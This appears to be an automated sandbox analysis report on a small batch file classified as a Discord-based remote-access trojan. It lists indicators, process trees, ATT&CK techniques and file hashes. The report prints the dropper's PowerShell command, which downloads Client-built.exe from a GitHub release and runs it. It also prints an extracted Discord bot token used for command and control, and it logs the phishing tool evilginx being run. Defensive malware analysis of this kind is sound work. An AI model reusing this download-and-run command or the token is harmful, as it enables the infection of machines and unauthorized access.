discordrat | 1d5593bfa4f97e9c69b0d786fd3eedfeee31bc6c7c5ded44aacc1979a808258d

Analysis

max time kernel
149s
max time network
146s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-06-2024 21:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Suckcess.bat
Size

253B
MD5

cf33abdc63dada08dc95c45f82af29ba
SHA1

bd3790e05c238e483c1eb02c96e496825de1387a
SHA256

1d5593bfa4f97e9c69b0d786fd3eedfeee31bc6c7c5ded44aacc1979a808258d
SHA512

91d1d15cfff42d8aba4e7a60a7d71f1c3ccd34bc6489d6c7832af227e42c3e617cfdede9349e5245dfa65f4d30a0dbad4c7154dc764e9cb8a45d5f2355d6198e

Score

10^/10

discordrat execution persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI1MTEyMTQwMTU3ODkxNzg4OA.Go9Uh2.8G5SNBTIsuvTitRHKk6_NDHSG19899pkj-8WbQ
server_id
1251101778309550161

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	3128	powershell.exe
4	3128	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3128	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1600	Client-built.exe
4100	evilginx.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
10	discord.com
23	discord.com
77	raw.githubusercontent.com
69	raw.githubusercontent.com
22	raw.githubusercontent.com
24	discord.com
76	raw.githubusercontent.com
78	raw.githubusercontent.com
16	discord.com
19	discord.com
21	raw.githubusercontent.com
11	discord.com
20	discord.com
75	raw.githubusercontent.com

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629609611572526"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3128	powershell.exe
3128	powershell.exe
3128	powershell.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	1600	Client-built.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
2716	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4028 wrote to memory of 3128	4028	cmd.exe	74
PID 4028 wrote to memory of 3128	4028	cmd.exe	74
PID 4028 wrote to memory of 1600	4028	cmd.exe	75
PID 4028 wrote to memory of 1600	4028	cmd.exe	75
PID 1012 wrote to memory of 2524	1012	chrome.exe	78
PID 1012 wrote to memory of 2524	1012	chrome.exe	78
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 3016	1012	chrome.exe	80
PID 1012 wrote to memory of 5076	1012	chrome.exe	81
PID 1012 wrote to memory of 5076	1012	chrome.exe	81
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82
PID 1012 wrote to memory of 3520	1012	chrome.exe	82

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Suckcess.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://github.com/skibidisigmer/finally/releases/download/rat/Client-built.exe -OutFile Client-built.exe"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3128
- C:\Users\Admin\AppData\Local\Temp\Client-built.exe
  CLient-built.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0xe8,0x7ffe34e09758,0x7ffe34e09768,0x7ffe34e09778
  2⤵
  PID:2524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:2
  2⤵
  PID:3016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1780 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1816 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2940 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2956 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:1
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:1
  2⤵
  PID:3580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4776 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:3208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5080 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:3656
- C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:32
- - C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff785cf7688,0x7ff785cf7698,0x7ff785cf76a8
    3⤵
    PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5276 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:1
  2⤵
  PID:976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5052 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:4672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=2252,i,14750679897379924004,6861202679716704576,131072 /prefetch:8
  2⤵
  PID:4012

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4100

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4380

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit\" -spe -an -ai#7zMap14470:120:7zEvent24738
1⤵
- Suspicious use of FindShellTrayWindow
PID:2716

C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit\evilginx.exe
"C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit\evilginx.exe"
1⤵
- Executes dropped EXE
PID:4100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
24af31f5141e1143eb99867d13d4f4b8

SHA1
f008e0f82fcdd7ee108e990b52764ab7316b0035

SHA256
a50f128b10ccb33962cb340c97be12767752a29abc3e6c8dc529c19a90342418

SHA512
5b7ff5f76453604504017e0f54676979df255fe22deb753f3e52482963cebf74037a5b6135c16aff4cb44c19368dfc786b1378beecf3322b089f66aa9f861c25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\4712ce87-4002-4dd3-9a31-340ec75b4d65.tmp

Filesize
1KB

MD5
50216779f02ca556567a44282dfb0061

SHA1
ac1deb2d8cbe05283be630088ad4d0f7b6de9c79

SHA256
1d4e09b056b07a403ac1461b0a71010b13daa4361b41155f40f1747e392b7619

SHA512
7ca7f0b8bb3f27a71517a2e3089133c5ff8da93926623bd4bc9bf5e3bac6a9d0681c5dbf72a6e0cdcd46f41e18068e12a1ea1da9d0a8fa128fe7621737360577

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
90000eb48c258a6f937be0e97d061f57

SHA1
e56744c5ba9a03b9cdfd99341eb535d93d65f556

SHA256
4bb852546257b5fd7821610b09f06502ea367893acb665bd86c25d272e1837c8

SHA512
fd72b57e689e0d59c6c992175be704d542d21b1246a1731ae573ef1b332529305de3ded37029d10adc00dc2132dc4adaa1b7c1608f6ce1f54b28505254b7a03e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
259fb49ff881113a2d8f6e2c9c52056a

SHA1
383cc9898b594786826228491ece6ac5c003f78d

SHA256
514f697787b8b277a1f3d8de5168d79d39dc10d3efccdaf3f5ebe6c11e14af4e

SHA512
129d04252f038c4a521441a7772a8afcd81c1b9c0377fbdeb3b42a7adfb2a260f746f41a48f4f78cd887e3d3661a67ff187707b8e509c8d80d624c3f89118b01

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
61ff6db3551feec93d2c1d5148859346

SHA1
5fe646ddad670be6329cf6b6e2a67b146533bcdb

SHA256
884d7fd99768e97f09b57136245b9d9498fbec76272c27887f6abb6b63a87d6f

SHA512
4eb6a213595338dcca8dee1fe1075070df258a731288e1e230306b4746284e9bee856de79ae536fca15bdfc2d9baac9cb693bf0d8f7aef0d34f36a788751c0f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
c4fc33e04d327dc35738647166d84e0c

SHA1
da799b57920aa8ab2da935c008990326534ab2e7

SHA256
359c78968e768ecd829d993412789243217ff651733a664de68b7b299ef2c670

SHA512
bba3b057c0dd0d13570bab3a311a8bce83b5160e4af2ba0a116ffe7335926df67bf595cd05ec3fd831f1b7ba2442714302394028677e3a5c4398d1ef08cebe66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0c7dd9c455e37b5f8917ca3a108ec7ba

SHA1
a869038b97575a7df9847550eae5bf98fc5d9aea

SHA256
1104d2aa80b6dc59b5db3f707620db13f8b082465cb4abb28928da91a5816c74

SHA512
fc80cd83af79324e75576c39f92c3dc98f1f1376060ea3203753801a29df3879d8f5e408ade30f30f6329a50d91e59233940266753f4bf53a7645bfd72edd051

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
57a0b41178c001765edb0f621ddc28d5

SHA1
92083edc55dec725bbf938407465c05286dd6184

SHA256
9343350b6b089294cdd994081b814cb0b0705c3e01c3e50680915b9da2198506

SHA512
8b5aed2a2cdd8e7a7719308b2673b3df34384d0f2ef414ddaa7860e06a6dd4271d03416e509bd326ab68d13554b708c48fc46352f7c1751a93f6cb3601eacfc1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
8d86596880985d209aa68cef081e371e

SHA1
1ee231b78c3cc937d12de4631c5de172e904f690

SHA256
e6cec737f189cdad4c6b52da55c824eae8bc677032d0fae8e82dc52c6d08e652

SHA512
ecd1e836e0f6ce6964edd0c393956b5a708f08d824e47240e61391572a4daf1ea5529e9a4e059b3029671ddcc993985ab850627d0c1d8e56f1f20e0130b45601

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
12KB

MD5
3f61a9e0ecd245017f3ea7c18f78fc33

SHA1
df0325745061f8fe095b3d46c52c373f9e9efc18

SHA256
23ef673d65a37d2370cbc8050b475a06ffb97f4b32c8420c7ffc03b027071f0b

SHA512
5e0cfdb303e5b9ecad520f45f4452cca07db87996f14e7a8b8f80501588f8b98bc68d12be54bd4f0973496b79da5367027a9b2fd6d409ec742557ed6fc77cc3c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
284KB

MD5
d055024b6b78eec37275b78699ebb8ab

SHA1
797a57bd051eba3296f7771db3d08e10365a8843

SHA256
cb12d0d528ee91e0685d2045b27404a8e4163f3d5d8e4fcfdfb5df47a06253e1

SHA512
72ae93074d91bf9ad733583390e2929ec25e8d9cd3453e082a1199647f210e0d21a7dc07ccdabb17c4f796f941b18b2b0202d4569eca4d5b2d8e8be2b87e305a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
103KB

MD5
8e4bfaea8fdb0ffa064cc8280a224593

SHA1
8d297d685658cd986b17ae9240a9742698317248

SHA256
760a23cdbc209685c5eb3d99ec3fef21df74043e0dc4c8c0490582040565df30

SHA512
c857958a8260d37fdbe93494c6996791dbed91fa5738d3c88052037c60502a931e829a44795bbca3a221d6a40be44bbdccc5fcc3f52fb12928f83da17bbfd26e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe594750.TMP

Filesize
93KB

MD5
475ecccb3b191316425471862cd0a116

SHA1
0ee583bc093e9b1ff992cd4f9533cb36275d7fc6

SHA256
00477f6f7e577ded980544cae8cb559fd35bab5020b44d6eb3e62fdd9c073c93

SHA512
b228fff9db4bfb5850d06d9c4bbc4651e550ec77ec631b9876220f4b4d2cf16b0be7602c471a3ac403e617f2a622cda3535e3a94976940d2ce4332ca17c783c6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client-built.exe

Filesize
78KB

MD5
31c62ca5843cc26ebcca2ed60d6257cc

SHA1
d241b2a59d6d7222b017b0c7af399de8a349af20

SHA256
e51fb4729a663f7edb468e57fbe0218c8823fe85746f1fa38b1a394ed62ab740

SHA512
d269fa6c4237713dfb174e52f863600fd93a373a04ea58cd7d184f2dab7b3969ca3dd4692ac07a1fd4fe0d5e67bde1297fb1dbfc22096f27603cb560d11a70f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4e2vniv3.2fl.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\evilginx-v3.3.0-windows-64bit.zip.crdownload

Filesize
8.0MB

MD5
53a1c9b8dc65ea940d3da15b781c96f3

SHA1
21a6fc0b48f7e3f01cba753a2514b1b696bbfc47

SHA256
3b3fd00d44c44dbb8387dcd1b41772fb3fdd14b15d24d2af981d9da783545b68

SHA512
